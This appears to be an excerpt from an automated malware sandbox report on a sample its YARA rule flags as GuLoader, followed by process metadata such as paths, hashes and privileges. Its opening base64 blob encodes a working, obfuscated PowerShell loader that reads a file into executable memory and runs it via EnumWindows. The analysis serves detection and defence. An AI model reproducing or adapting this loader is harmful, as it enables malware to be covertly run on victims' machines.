ZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgBkAGUAcgBmAGkAYQB1ACAAVABhAGwAbAB3AG8AbwA1ACAAdgBpAG4AbwBsAG8AZwBpAHMAdAAgAEwATwBZAEEATABFACAAVgBhAGwAZQByAGkANAAgAGwAYQB2AGkAbgAgAEIAYQBhAHIAOQAgAGYAbwByAHYAZQBuAHQAZQBsACAATgBvAG4AYwBvAG4AdgAgAA0ACgAjAFAARQBSAFMATwBOAE4AQQBWACAAaQBkAGUAbQBwACAAcwB0AGEAcgB0ACAAYwBoAG8AeQBhAGkAbgB0AGkAIABsAG8AeABpAGMAdAAgAEgAZQBzAHQAZQBiAHIAZQAxACAARgBvAGUAbABlAGIAYQBsACAATQBvAGkAcwAgAEwAYQBsAGwAZQB0ACAATwBiAGUAbABpAHMAawAzACAAZAByAGkAawBrACAATABhAG4AYQBzAHIAIAANAAoAIwBiAGUAcwB0AHIAYQBhAGwAaQBuACAAUwBUAFIATQBQAEUASAAgAFYARQBEAEwAIABNAHkAZQBsAG8AIABEAGkAcwBoACAAQQBjAGMAZQBwAHQAMQAgAFUAbgBwAGwAMwAgAEEAUgBCAEUASgBEAFMATABTAEgAIABBAG4AbQBlAGwAZABlAGwAcwBlACAAUwBLAE8AVgBIAFkAVABUAEUAIABwAHIAcwB0AGUAcwBrAGEAYgAgAFAAdQBiAGwAaQBjAGkAcwA4ACAAVQBtAGkAbgBkAGUAbAA0ACAADQAKACMAcwBwAG8AcgB0AHMAbQBhACAARABrAG4AaQBuAGcAcwBzADQAIABEAGUAcABvAHMAaQAxACAAcgBlAGcAbgBpAG4AZwBzAGYAdQAgAHMAdQBzAHAAZQAgAEQAZQBiAGEAIAByAGUAcQB1AGkAcgAgAFMAYQBsAHQAcwB0AGUAbgBtADEAIABSAEQARQBQAEEATgBHAEkAIAANAAoAIwBTAGUAbAB2AG0AbwBkAHMAaQBnACAAUwBVAEIARAAgAGsAdgBrAHMAZgBpAG4AZwBlACAAQQBuAG8AbQAgAHQAaABhAGkAbABuAGQAZQAgAE8AbgBkAHUAIABuAG8AbgBwACAAVwBJAE4ARABCACAAYQB0AG8AbQB2AGEAYQBiAG4AZQAgAEMAaABpAGUAIABzAHUAYgBjAGgAbwByAG8AaQAgAFMAVABVAFAASABFAEYATwBLACAASQBtAGIAcgB1AGUAbQAgAEUAcgBuAHIAaQBuAGcAcwBmAHkAIABEAHIAbwBvAHAAcwBiADEAIABwAHIAYQBpAHMAZQBmAHUAbABuACAASQBOAEcARQBOACAATwB2AGUAcgAgAEgAbwBkAHMAIABPAHYAZQByAGgAYQB1AGwAZQA4ACAAdwBvAG8AZABzACAAdQByAGUAdABoAHIAbwAgAEwAbwBrAGEAbABrACAADQAKACMAUgBVAE4ARwBMAEUAUwBTAEsAIABWAGUAcgBkACAAYwB5AGMAbABvAGQAIABhAGYAZABrAG4AaQBuAGcAIABiAHUAcwBsACAAQQB0AHQAdQBuAGkAbgBnACAAUwBhAG4AaQB0AGkAcwBpACAAUABoAG8AdABvAHMAIABCAG8AcgBlAHAAbABhAHQAZgAgAE0AYQBqAG8AcgAgAEoAVQBNAEIATABFACAAVwBIAEUARQBMAEkATgAgAEwAZQBlAHAAaQB0AGQAcgA2ACAAVQBOAFUAUwBFAEQAIABNAEEARwBOACAAQQBnAHIAYQBmADEAIABBAG0AYgBlAHIAbgA0ACAAQQBuAGQAZQBuAGsAbABhADgAIABKAGEAZwBnAGUAZABuACAAcwBvAGwAaQBkAGEAdABpAG4AZwAgAEEAbgBnAGkAdgBlACAAQgBSAEUAVgBWACAATQBJAFMAVABBAE4ASwBFAFIAIAANAAoAIwBQAGEAbABlAGkAYwBoAHQAaAB5ADYAIABDAGwAbwB3AG4AZQByAGkAIAB0AHIAaQB2AHMAZQBsAHMAcAAgAFAAYQBtAGUANgAgAFQAaQBnAGgAdAB3AGkAIABVAG4AdwBpAGwAOAAgAFAAZQByAGkANAAgAFAAcgBvAGQAdQBrACAARABhAGcAYwBlAG4AdAByACAARwBSAEEATgBVAEwAQQAgAFMAagB1AHMAcwBlAG4AcwByAG8ANQAgAEkAUwBDAEgASQBBAEMAQgBFACAATABlAGUAZgA3ACAADQAKACMAVAByAGUAbQBvAHUAcgBpAG4AdAA1ACAAUwBKAFUAUwBLAEUATQBBAEwAIABEAGoAZQBsAGwAIABNAGkAbABpAHQAcgBsADkAIABHAGwAbwBzAHMAYQBuACAAUgBFAFYASQBFAFcAUwBEACAAUgBFAEUATABQAEUARABBAE4AVAAgAEgAdQBzAGgAbwBsAGQAZQAgAEEATABJAEUATgBBACAARABvAGIAYgBlAGwAdABmAHUAbgAgAFQAZQBhAHQAIABIAGkAbgBkAGUAcgBlACAAUwBrAHkAZAA3ACAAbQB5AGcAZwBlAHMAIABMAHkAbgBsAGEAYQBzAGgAIABQAGEAYQB0AHIAIABGAGEAYgByAGkAawBzADkAIAANAAoAIwBQAEEAQQBUAEUARwBOAEUAUgAgAEQAZQB0AGEAbABqAGUAcgBlAHIAIAB0AGkAZwBnAGUAcgBzAGsAZQAgAEYAaQBsAGUAcwAgAHIAZQB0AHMAbwBwAGcAcgAgAFAATABVAFIAIABKAHUAZwBlAG4AZABtAG4AcwB0ACAAVQBkAGIAdQA1ACAASABlAGEAdgB5AGgAIABtAGkAbABpACAAbQBlAGwAbwBkACAAYQBmAGwAYQBkAG4AaQBuACAADQAKACMAYQBmAHQAdgAgAGEAYQBuAGQAZQB2AGUAIABiAHIAbwBkAHkAYQBnAGEAcwAgAHQAZQBsAGUAbwBjAGUAcgBhAHMAIABPAEMAVABBAFYATwBLACAAWgBhAHIAegB1ADMAIABJAE4ARABTACAAVABXAEkAUwBDACAAUwBLAE8AVgBTAEwATwAgAFQAbwB3AG4AbABhAG4AZABsAHkAIAANAAoAIwBQAFIASQBTACAARwByAHUAcwB2AGUAagBlADkAIABVAG4AbQBhAHIAYgBsAGUAaQB6ACAAQQBMAEsATwBIAE8ATAAgAEQARQBWAEkAQQBUAEkATwBOACAASABvAG0AYQB0AG8AIABDAHIAZQBhAHQAaQAgAFMAdABvAGIAcwBiADcAIABhAG4AZgBsAGoAZQBuACAARgBvAHIAZQB0AGEAZwBlAG4AIABQAHIAbwB0ACAAVQBQAEwARQBBAFAARQBEACAAZABpAG0AcABsAGUAbQBlACAAZwBlAHIAdABoAGEAcwBoAGEAIABTAFQATwBSAEsARQBOAEIAQgAgAA0ACgAjAEEAcwBzAHUAcgBhAGIAbAAgAE0AZQB0AGEAZgBvAHIAZQByAG4AIABJAEgAVQBLAE8ATQBQACAAWAB5AGwAbwBjADgAIABTAHQAYQBuAGQAYQByACAASABhAG4AZABsAGkAbgBnAHMAbAAgAFAAZQB3AGYAdQBsAGIAbABvADIAIABNAGkAcwB0AG4AMwAgAE8AWQBTAFQARQBSACAARABlAHQAYQBpAGwAcAByACAAcgBlAGYAbwByACAAUgBJAEcAUwBSAEUAVgBJACAAYwBsAG8AZgBpAGIAIABLAE4ASQBDACAAQgByAG4AZQBsAG8AawBrACAARABlAG0AbwBuAHQAZQByADgAIAB0AGEAcgB2ACAAcwBsAGcAZQByAHMAdAAgAFUATgBEAEUAUgAgAA0ACgAjAFMAYQBuAHMAZQB2AGUAOQAgAEkAcgByAGUAcwBwACAAQgBJAFIAQwBIAEUAIABNAGUAZwBhACAARABhAGcAbABuAHMAcwBhADIAIABLAFkAUwBUACAAUwB0AG8AbQBhAHQAbwBsAG8AIABBAHQAdAB5ACAAcgB1AHQAaQBuAGUAcwBzACAAcABpAGMAYQBtAGEAcgAgAGwAYQBjAGMAaQBjAGgAZQAgAEIAWQBHAEcARQBNAFkATgAgAGcAcgBpAG0AYQBzACAAaQBuAHQAcgB1ACAAbQBhAHIAcQAgAGoAYQByAGQAbwBuAG4AIABjAGgAbwBsAG8AcwAgAE0ATwBSAEIASQAgAFMAQQBWAEEARwBFAFMAUwAgAFIASQBEAEUASABFAFMAVABFAFMAIABTAHQAZQBtAG0AZQByAGUAdABzADUAIAByAGUAdgBpACAAQgBhAHMAdABpAGwAbAA4ACAAQgBlAGQAYQAgAFMAQwBVAFIAUgBJAEUAIABVAE0ARQBEAEcAUgAgAEsAeQBsAGkAbgAgAHUAbgBmAGkAIABzAGwAaQBwACAAUABSAEUASABFAE4AUwAgAA0ACgAjAEEAbgBkAGUAbgBrAGwAYQBzAHMAIABkAGUAbQBhACAAUwBDAEkATABMAEEARQBSACAAYgBsAHIAZQBoAGEAIABSAG8AbgBpAG4AZwA4ACAAQwBVAEUATQBBAE4AUwBIAEkAIABLAGEAcwBlAHIAbgAgAFIAdQBmAGcAYQByAGQAaQBuACAAcAByAGEAbgBnAGUAbgAgAFUAUwBQAEUAQwBJAEYASQAgAFMAdQBiAGwAaQBtACAASwBFAFIATgBFAE8AUAAgAEEAcgBpAGQAIABiAHIAbgBlAGYAZAAgAA0ACgAjAEsAYQBmAGYAZQBnACAAQgBvAG8AbgBkAG8AZwBnAGwAZQAgAE4AbwBzAHQAIABSAGkAZgBsAGUAdAB0AG8AcgA3ACAAUwBVAFIARwBFAEwARQBTAFMAIABJAGQAcgB0AHMAaABqAHMAawAyACAAcgBlAHMAZQByAHYAYQB0AGkAbwAgAGsAaQBzAHMAZQAgAGcAYQB5AGwAdQBzAHMAaQB0ACAAYQB0AG8AbQBhAGYAZgBhAGwAZAAgAFIAQQBHAEUATwBVAFMAIABCAHUAdABpAGsAcwBkAHIAaQAgAG8AcABkAGEAdABlACAASABvAHIAbgBiAHIAaQA0ACAAQwBvAG4AcwBhAG4ANwAgAE0ATABLAEUASwAgAEkAbwBkAGkAZABwAGgAaQBsADYAIABJAGQAZQBhAGwAaQBzAG0AZQA0ACAARgBsAGEAZwBlACAASQBuAHYAbwBsAHYAZQByAHMANAAgAHUAbABuAGEAYQBuAGkAIABSAGsAZQBuAHUAbgAgAGwAaQBtAGUAbABpACAAYQBhAHIAcgBpACAAbQBhAGQAZABvAHgAdQBkAHYAIABIAGUAbABoAGUAcwB0AGUAbgBhACAAUABvAHMAdAB1AGwAZQByADEAIABCAGUAegBlAGwAcwBjACAAQgBsAGkAbgAgAA0ACgAjAEMAYQBzAHQAZQByADYAIAB2AGEAbgBkACAAYwBoAGEAZQBuAG8AIABTAHEAdQBhAHQAdAA1ACAASABJAEcASABMACAAQwBvAG4AYwBoAGEAZQAgAFAAYQByAHQAIABEAEUASwBMACAAcwB1AGIAcwBpAGQAZQAgAHUAbgBkAGUAIABmAGEAdQBuAGUAcgBhACAAcwBwAHIAZQBhACAAUABBAEMASQBGAEkAQwBBACAARgBKAEUATgBEAFQATABJACAAYwBlAHAAaABhAGwAbwB0AGgAbwAgAFMARQBSAFIAQQBUAEkATwAgAFMAZQByAGIAaQBzAGsAZQBsADgAIAANAAoAIwBGAEwATABFAFMAQQBOACAAQQByAGEAZwBvAHIAbgB1AG4AYQAgAGUAbgBzAHIAZQB0AHQAZQBkAGUAIABNAHkAZQBsACAAcwB1AHAAZQByAHMAZQB4AGUAIABBAGcAZwByAGEAdgBlAHIAZQAgAHQAaQBtAGUAbABvAGYAIABzAGkAbQBlAG8AbgBiAGUAdgBpACAAUABSAEUATwBQAEUATgBJAE4AIABzAG0AZQBsAHQAZQAgAGoAZQBsAGwAeQBmAGkAcwBoAGEAIABHAGUAcgByAGEAIABQAG8AaQB0AHIAYQBpAGwAbwAgAA0ACgAjAFgAZQBuAG8AZwBsAG8AcwAgAE8AdQB0AG4AIAByAGUAdgBpAHMAbwByAGYAIABWAEEAQQBCAEUATgBGAEEAIABSAHUAbQBzAGsAaQBiAGUAcgAxACAAQQB0AHQAZQBzAHQAZQA5ACAASABhAGEAbgBkAGgAdgBlAGwAcwA4ACAARABJAFAATABPAE0AIABTAEkATABFAE4AQQBMACAATwBhAGsAeQBzAGwAagBkADQAIABMAGEAdABlAG4AcwAgAG0AZgBnAGcAcgB1AG4AIABrAGEAcgB0AG8AdABlAGsAcwBvACAADQAKACMAZQBzAHQAbwAgAFQAYQBsAG0AIABUAHUAYQByAGUAZwAyACAAQgBsAG8AawBmAHUAbgBrAHQAaQAxACAARgBvAHIAbABhACAAVAByAGEAbgAxACAAQQByAGIAZQBqAGQAIABOAG8AbgBjAG8AIABzAGkAZwB0AGUAbQBlAGwAcwBvACAARwBhAGwAdgBhAG4AaQAgAEYAbwBkAGUAcgBmAGEAIABSAGUAcwBlAGMAdAA1ACAADQAKACMARQB0AGEAcABlAGwAYgBlAHQAIABCAGEAYwBrAGYAaQBzAGMAOAAgAE0AWQBMAEQAUgBFACAATQBhAGwAYwA4ACAAZwBhAG0AbQBpAGMAawB1ACAARQBnAG0AdQBuAHQAdgBhACAASABLAEEAUwAgAFUAbgBpAHIAbwBuAGkAYwA1ACAAVABpAGwAYgBhAGcAZQBzAGsAIABGAEkAUgBFAE8ARwBUAFkAVgAgAFMAdABlAGEAZABpAGUAcwB0ACAAUgBnAHQAZQBuAGQAZQBzADQAIABTAGsAdgBhAGQAcgBvAG4AZQAgAEIAcgBlAGkAcwBsAGEAawBpACAADQAKACMAVgBJAFIASwBTAE8ATQBIACAARwB1AGUAcgA4ACAATQBBAE4AQwBIAEUAIABBAGMAYwBvAG0AbQBvAGQAYQB0ACAAUwBlAG0AaQB2AGUAcgB0AGkANwAgAE4AQQBJAFYAIABMAG8AZwBvAGcAIABTAFAASQBEAFMARwAgAGcAawBhAG4AdABsACAAdAB1AGcAcgBpAGsAcwBwAHIAIABjAGgAYQBtACAAUwB5AHMAdABlAG0AYgBlADUAIABCAFIATwBOAFoARQBGACAADQAKACMAUgB1AG0AcABsAGUAbABhAHMAIABEAEEATgBTAEUATQBVAFMARQAgAE0ARQBTAE8AUgBSAEgAIABVAE4ARABJAFMAQwBPAFYARQAgAFQAaQBkAHQAYQBnAGUAcgBlAHIAIABUAHkAcABvAHMAcwB0AG8ANwAgAEIAUgBPAEsAQQBEAEUAUgBTAFIAIABNAHkAbwBzAG8AdAAgAHIAaQBkAGkAYwB1AGwAbwB1ACAAQgB1AGcAdAAgAHMAbABhAG4AdABlACAAagBvAGwAbABpAGUAZABhAG4AdAAgAE8ATQBEAEkAUgBJAEcARQBSACAARABlAHQAcgBvAG4AaQBzACAARgBhAGQAZAAzACAARAByAGkAawBrACAASwBSAEEARwBFAEYAVQBHACAAUABTAEUAVQBEAE8AQQBNAEEAIABTAFkARABEACAAVQBOAEQARQBUAFIASQBNAEUAIAB0AGEAbQBsAHUAbgBnAHMAdQAgAGwAZQBvAG4AYQByAGQAbwB1ACAATwBwAGwAcgAgAGcAZQBtAGkAbgBhAHQAIABGAHIAdQBnAHQAaAA1ACAATQBFAFQAQQAgAFYAQQBOAEQATABCACAAVQBOAFQASABPACAAbQBpAHMAcgBlAGYAZQByAHIAZQAgAEsAaABhAGwANgAgAFMAdQBrAHIAaQBuAGcAZQAgAHYAZwB0AGkAZwAgAA0ACgANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAYwBoAG8AbgBkAHIAbwBnAGEAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAZwBkAGkAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBGAG8AbgB0AHMAQQAoAHMAdAByAGkAbgBnACAAUgB1AGMAdABpAG8AdQAsAHUAaQBuAHQAIABNAHUAcwBrAGkAbAB5ADcALABpAG4AdAAgAEQAZQBiAGkANwAsAGkAbgB0ACAAYwBoAG8AbgBkAHIAbwBnAGEAMAAsAGkAbgB0ACAARgBhAHIAbQBhAGsALABpAG4AdAAgAFEAdQBpAG4AcQB1AGUAdgBlACwAaQBuAHQAIABTAEwARwBUACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQBhAGMAKABbAE0AYQByAHMAaABhAGwAQQBzACgAVQBuAG0AYQBuAGEAZwBlAGQAVAB5AHAAZQAuAEwAUABTAHQAcgApAF0AcwB0AHIAaQBuAGcAIABSAHUAYwB0AGkAbwB1ACwAdQBpAG4AdAAgAE0AdQBzAGsAaQBsAHkANwAsAGkAbgB0ACAARABlAGIAaQA3ACwAaQBuAHQAIABjAGgAbwBuAGQAcgBvAGcAYQAwACwAaQBuAHQAIABGAGEAcgBtAGEAawAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQB2AGUALABpAG4AdAAgAFMATABHAFQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEMAbABhAHQAaAByAGEANAAsAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEALAByAGUAZgAgAEkAbgB0ADMAMgAgAGMAaABvAG4AZAByAG8AZwBhACwAaQBuAHQAIABPAHUAdABoAG8AdwBsAGkAbgBnADUALABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAUgBlAGEAZABGAGkAbABlACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQwBEAEEAQwAoAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEAMAAsAHUAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQAxACwASQBuAHQAUAB0AHIAIABWAGEAcgBlAGQAZQBrAGwAYQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABWAGEAcgBlAGQAZQBrAGwAYQAzACwAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAVQBTAEUAUgAzADIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKABJAG4AdABQAHQAcgAgAFYAYQByAGUAZABlAGsAbABhADUALABpAG4AdAAgAFYAYQByAGUAZABlAGsAbABhADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAFIAZQBtAG8AcAA4ACAARABSAFQAUgBJAE4ARQBUAEkATgAgAFIAZQB0AHIAZQA0ACAAVABqAGUAcgByAGkAbAAgAFUAcgBzAGsAbwB2AHMAbQByACAARQB4AGkAbABpAGMAbQB5AHMAdAA2ACAASQBsAGQAcwBwAHkAZQBuAGQAZQAgAEIAYQBrAHQAIABNAEUATABJAE8AUgBBACAAcwByAHYAZQByAGkAIABBAHUAZwB1AHIAZQByACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwASABlAHQAZQByAG8AMwAuAGQAYQB0ACIADQAKACMAcABvAHMAdABwACAATQBvAG4AbwB0AG8AbgBlAHIAZQAgAFMASQBHAE4ASQBGACAAVABpAGQAcwBrAHIAYQAgAEwARQBGAFQASQAgAFIARQBGAE8AUgBNAFAATABBAE4AIABLAGwAYQBnADUAIABSAG8AdABhAG0AYQBuACAASQBuAGQAaQB2ACAAUgBvAHQAdABlAGYAbgBnAGUAIABUAGUAcgByAGkAdABvAHIAaQAyACAAWABZAEwATwBDAE8AUABBAFAAIABnAG8AZwB5AGQAZQAgAE0AaQBjAHIAbwBiAGUAcAAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADMAPQAwADsADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABjAGgAbwBuAGQAcgBvAGcAYQA4AD0AWwBjAGgAbwBuAGQAcgBvAGcAYQAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADMALAAwACwAWwByAGUAZgBdACQAYwBoAG8AbgBkAHIAbwBnAGEAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAEsAQQBSAFQATwAgAEMAaABpAGwAIABlAHMAcAByAGkAdABpAG4AcwB0ACAAUwBIAFIASQBMAEwASQBOACAAQgBPAFAATABTACAAQwByAHkAcAB0AG8AIABVAGsAcgBsAGkAZwBzAHQAZQAxACAATQBlAGwAbwB0AHIAYQAgAFMAVQBQAFAAUgBFAFMASQBWAEUAIABDAGgAZQBmACAAUgBvAHMAZQB2AGkAbgBlADUAIABCAGkAbABiAHIAbwBlAG4AcwBwACAAQQByAGIAZQBqADIAIABJAG4AdABlAHIAYwBhAG0AcAAgAEcARQBWAEEATABUAEkAIABSAFUAQwBIAEUAUgBTAFQARQBOACAARABJAFMAUABSACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEANAA9AFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBWAGkAYQBjACgAJABjAGgAbwBuAGQAcgBvAGcAYQAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAGQAaQBmAGYAZQByAGUAbgAgAGgAYQB2AGUAIABNAG8AYgBpAGwAZQB0AHMAZwByADMAIABhAHIAawBmAGQAZQByACAAaQBuAGQAawAgAEsATABPAEQAUgBJAEEATgBFAFIAIABUAEEAUwBLAEUASwBSAEEAQgBCACAAUwBKAFUAUwBTACAAdwBoAGUAYQB0ACAASAB5AHAAbwBwAGgAeQBzACAAQQBmAGgAbwBsAGQAcwBoAG8AdAAzACAAVABoAHkAcgBvAGMAbwBsACAAVQBEAFYAVQAgAGIAdQBmAGYAIABwAG8AbAB5AGUAdABoACAAYgByAGkAcwBrAGUAdAB1AG4AdAAgAFQAWQBFAFQAQwBPAFEAIABDAG8AbQBwAGEAIABBAGYAdABhAGwAZQBwADYAIABzAHQAaQBuAGsAaQAgAEcARQBOAE4ARQBNAEIATwBSACAAYQBmAHQAZQByAHAAIABBAGwAaQBxAHUAYQBuADEAIABhAG4AdABpAG0AbwBuAHkAZwAgAEYAcgBhAG4AdABzACAAWgBJAFQASQAgAE4AQQBHAEwARQBUAEcAIABCAEwATwBUACAAQgBlAHMAbgBhAGsAawBlADcAIABVAE4ARABUAEEAIABCAHIAYQBzAGgAbAB5AGkAZwAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADUAPQAwADsADQAKACMAQgBvAGwAaQBkAGUAcwBzAGwAYQA1ACAATABBAE4ARABTAFIAIABQAHIAbwBzACAAVABsAGwAZQBzADgAIABPAG0AawBsAGEAcwBzAGkAZgBpADcAIABQAGUAbgB0AGEAYwByAG8AbgBrADQAIABIAEUAUABUAEEAVAAgAFcAYQBrAGUAcgAgAHIAZQBnAGkAbwAgAFUAZwBlAHMAawByAGkANwAgAFMAbABhAHIANAAgAEYATwBSAEUATAAgAA0ACgBbAGMAaABvAG4AZAByAG8AZwBhADEAXQA6ADoAQwBEAEEAQwAoACQAYwBoAG8AbgBkAHIAbwBnAGEANAAsACQAYwBoAG8AbgBkAHIAbwBnAGEAMwAsADUAOAA3ADYANwAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADUALAAwACkADQAKACMAQgBFAFMASwAgAFMAdAByAGUAZQB0AHcAYQByAGQANwAgAEwAZQBqAHIAdQBkAHMAdAB5AHIANgAgAFUAbgBsAGEAbgBnAHUAIAB1AG4AawBpAG4AZAAgAEgAQQBLAE0AIAB3AHIAaQBnAGgAdAByAHkAIABCAGEAZwBnAGEAYQByAGQAZQBuADIAIABTAHUAYgBjAG8AbgB0AHIAYQA4ACAAZgBsAGEAdgAgAEcAcgBhAHYAcwB0AGUAZAA3ACAASABpAGcAaABoAGEAdABiAGEAIABTAGgAYQBoACAADQAKAFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAGMAaABvAG4AZAByAG8AZwBhADMALAAgADAAKQANAAoADQAKAA==
      Imagebase:0x1170000
      File size:430592 bytes
      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000002.523684015.00000000096D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
      Reputation:high

      General

      Target ID:23
      Start time:14:03:02
      Start date:10/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7c9170000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:32
      Start time:14:03:31
      Start date:10/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdline
      Imagebase:0x1190000
      File size:2170976 bytes
      MD5 hash:350C52F71BDED7B99668585C15D70EEA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:moderate

      General

      Target ID:33
      Start time:14:03:33
      Start date:10/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES571F.tmp" "c:\Users\user\AppData\Local\Temp\xd0x2kfy\CSC444B4F613D554F189420B3812D9BACB.TMP"
      Imagebase:0xe40000
      File size:43176 bytes
      MD5 hash:C09985AE74F0882F208D75DE27770DFA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Disassembly

      No disassembly